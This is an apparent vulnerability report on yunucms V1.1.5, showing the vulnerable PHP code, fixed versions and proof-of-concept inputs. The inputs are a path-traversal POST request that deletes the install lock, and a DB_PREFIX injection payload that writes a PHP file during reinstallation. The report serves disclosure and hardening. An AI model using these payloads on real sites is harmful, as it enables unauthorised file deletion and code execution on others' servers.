Arbitrary File Deletion & Launch a new installation process to execute PHP code #1

@36huo

Description


Two issues were discovered in yunucms V1.1.5.
1. Arbitrary file deletion
2. Launching a new installation process to execute PHP code

1. There is an arbitrary file deletion vulnerability which allows remote attackers to unlink any file.

The code section which made this vulnerability possible is found in the /statics/ueditor/php/vendor/Local.class.php file, lines 34-68:

```php
public function remove(){
	$file = trim($_POST['key']);
	$config    = $this->config;

	$root_path = $config['root_path'];

	// security check
	$pathlist = explode("/", $file);
	if ($pathlist[0] != 'uploads' && $pathlist[1] != 'uploads') {
		return array(
			'state' => 'ERROR',
			'error' => 'Folders start from uploads'
		);
		exit();
	}

	$file_path = $root_path.$file;
	if( file_exists($file_path) ){
		$result = @unlink($file_path);
		if( $result ){
			return array(
				'state' => 'SUCCESS'
			);
		}else{
			return array(
				'state' => 'ERROR',
				'error' => 'delete file error'
			);
		}
	}

	return array(
		'state' => 'ERROR',
		'error' => 'file not exists'
	);
}
```

In the remove() function shown above, the content of $_POST['key'] is used in the call to unlink() without any authentication or sanitization. The only check is that one of the first two path segments equals `uploads`, so a key such as `/uploads/../data/install.lock` passes it and unlink() follows the `..` out of the uploads directory.

POC

url: /statics/ueditor/php/controller.php?action=remove
POST: key=/uploads/../data/install.lock

/data/install.lock has been removed.

2. Launching a new installation process to execute PHP code
After removing /data/install.lock, remote attackers can launch a new installation process.
The code section which made this vulnerability possible is found in the /statics/app/index/controller/Install.php file, lines 117-131:

```php
// update the database config file
$coffile = CONF_PATH.DS.'database.php';
Config::load($coffile, '', 'database');
$conflist = Config::get('','database');
$param = array(
    'hostname'  =>  $data['DB_HOST'],
    'hostport'  =>  $data['DB_PORT'],
    'database'  =>  $data['DB_NAME'],
    'username'  =>  $data['DB_USER'],
    'password'  =>  $data['DB_PWD'],
    'prefix'    =>  $data['DB_PREFIX']
);

setConfigfile($coffile, array_merge($conflist, $param));
$showstr .= show_msg('配置数据库信息完成...');
```

Following the setConfigfile() function into the /app/admin/common.php file, lines 76-87:

```php
// write the config file
function setConfigfile($file, $arr){
    $str="<?php \nreturn [\n";
    foreach($arr as $key=>$v){
        /*$v = htmlspecialchars_decode($v);
        $v = htmlspecialchars($v);*/

        $str.= "\t'".$key."'=>'".$v."',\n";
    }
    $str.="];\n";
    file_put_contents($file, $str);
}
```

file_put_contents() writes $arr into $file (config\database.php). Each value is concatenated straight into PHP source between single quotes, and the two htmlspecialchars lines that would have escaped it are commented out, so a value containing a quote breaks out of the string literal and becomes code the next time the config file is included.
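Hardened counterparts to the two functions quoted above, added here as an example and not taken from yunucms (the function names `resolveUploadPath`, `removeUpload` and `setConfigfileSafe` are hypothetical): the delete path is canonicalised with realpath() and required to stay under `<root>/uploads/`, and the config writer serialises values with var_export() so they can never be parsed as PHP.

```php
<?php
// Added example, not yunucms code. Names below are hypothetical.

// 1. Resolve a client-supplied key against $root_path and refuse anything
//    that does not canonicalise to an existing file inside <root>/uploads/.
function resolveUploadPath(string $root_path, string $key): ?string {
    $uploads = realpath($root_path . '/uploads');
    if ($uploads === false) {
        return null;
    }
    // realpath() collapses "..", symlinks and repeated separators, so the
    // key from the POC (/uploads/../data/install.lock) resolves to its real
    // location under <root>/data and fails the prefix test below.
    $target = realpath($root_path . '/' . ltrim($key, '/'));
    if ($target === false || !is_file($target)) {
        return null;   // missing path or a directory: nothing to unlink
    }
    if (strncmp($target, $uploads . DIRECTORY_SEPARATOR, strlen($uploads) + 1) !== 0) {
        return null;   // canonical path lies outside the uploads tree
    }
    return $target;
}

function removeUpload(string $root_path, string $key): array {
    $path = resolveUploadPath($root_path, $key);
    if ($path === null) {
        return ['state' => 'ERROR', 'error' => 'invalid file'];
    }
    return unlink($path)
        ? ['state' => 'SUCCESS']
        : ['state' => 'ERROR', 'error' => 'delete file error'];
}

// 2. Write the config with var_export(), which quotes and escapes every
//    value, so a DB_PREFIX containing quotes or brackets remains a string
//    literal instead of being executed when database.php is next included.
function setConfigfileSafe(string $file, array $arr): void {
    foreach ($arr as $k => $v) {
        if (!is_scalar($v) && $v !== null) {
            throw new InvalidArgumentException("non-scalar config value for $k");
        }
    }
    $str = "<?php\nreturn " . var_export($arr, true) . ";\n";
    file_put_contents($file, $str, LOCK_EX);
}
```

Both functions assume $root_path is the web root used by the original code; the prefix test also rejects a symlink inside uploads that points elsewhere, because realpath() resolves it first.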

POC
In installation step setup2, we can input `yunu_',].die(file_put_contents('uploads\image\f4ck.php','<?=phpinfo();?>'));$a=['a'=>'` into the 数据表前缀 (table prefix) field, DB_PREFIX.

When the installation process finishes, /data/database.php looks like this:
(screenshot of /data/database.php)

Visiting the homepage http://127.0.0.1:81 will create the file /uploads/image/f4ck.php.
